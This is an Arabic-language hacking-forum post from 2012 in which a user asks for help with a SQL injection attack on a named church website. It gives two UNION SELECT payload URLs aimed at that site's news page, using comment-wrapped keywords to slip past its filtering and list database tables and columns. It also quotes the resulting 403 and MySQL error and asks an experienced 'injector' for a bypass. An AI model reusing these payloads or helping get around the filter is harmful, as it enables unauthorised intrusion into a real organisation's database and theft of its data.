about SQL injection

DBZ · 03-10-2012, 07:21 PM

http://hopelutherancranberry.org/readnews.php?id=199

هذا الموقع فيه فلترة كبيره تجاوزت البعض و فشلت في البعض
حاولت بكل الشرحات و ما فيها اي حل
هاي الخطوات الي تفاديتها :

كود PHP:


			
http://hopelutherancranberry.org/readnews.php?id=199'/*!UNION SELECT*/ 1,2,3,/*!group_concat*/(table_name),5,6,7 from information_schema.tables-- -

لما بجي انفذ امر استعلام الجداول يعطيني فوردبيدن
و لما استخدم دا الامر :

كود PHP:


			
http://hopelutherancranberry.org/readnews.php?id=199'/*!UNION SELECT*/ 1,2,3,/*!concat*/(column_name,0x3a,table_name,0x3a,table_schema),5,6,7 from information_schema.columns-- -

الاستعلام مافيه فوربيدن و لكن ما يخرج لي اي معلومات و الله غريب
شو النتيجه :

كود:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/hope/public_html/readnews.php on line 78

كانه خطا في الاستعلام، و انا اضنه ذا الاستعلام صحيح 100%
لا فيه احد الطلاب هنا محترف حقن يفيدنا و اجركم على الله

سلام عليكم